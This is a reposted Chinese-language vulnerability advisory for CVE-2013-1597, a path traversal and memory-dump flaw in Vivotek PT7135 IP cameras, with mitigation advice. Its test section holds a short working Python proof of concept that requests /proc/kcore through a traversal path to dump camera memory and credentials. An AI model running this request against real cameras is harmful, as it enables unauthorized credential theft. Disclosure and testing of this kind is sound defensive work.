多个Vivotek IP摄像机目录遍历漏洞(CVE

发布日期:2013-04-30
更新日期:2013-05-02

受影响系统:
Vivotek PT7135 IP camera 0400a
 Vivotek PT7135 IP camera 0300a
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 59576
 CVE(CAN) ID: CVE-2013-1597
 
Vivotek是网络视频解决方案提供商。
 
Vivotek IP网络摄像头存在路径遍历和内存转储漏洞,0300a固件上,未经身份验证的远程攻击者通过内存转储可获取有效的用户凭证。0400a固件上,攻击者必须通过身份验证。
 
<*来源:Francisco Falcon
        Nahuel Riva
 
  链接:
       
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
import httplib

conn = httplib.HTTPConnection("192.168.1.100")
 conn.request("GET", "/../../../../../../../../../proc/kcore")
 resp = conn.getresponse()
 data = resp.read()

建议:
--------------------------------------------------------------------------------
临时解决方法:
 
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
 
* 除非需要,不要将摄像机联网。
 * 如果可能,过滤RTSP流(默认端口554)。
 * 在HTTP请求中,至少有一个代理过滤 /../../ 、getparam.cgi
 * 对 farseer.out 的每个请求,过滤参数 system.ntp 内的字符串。
 
厂商补丁:
 
Vivotek
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/ppwgw.html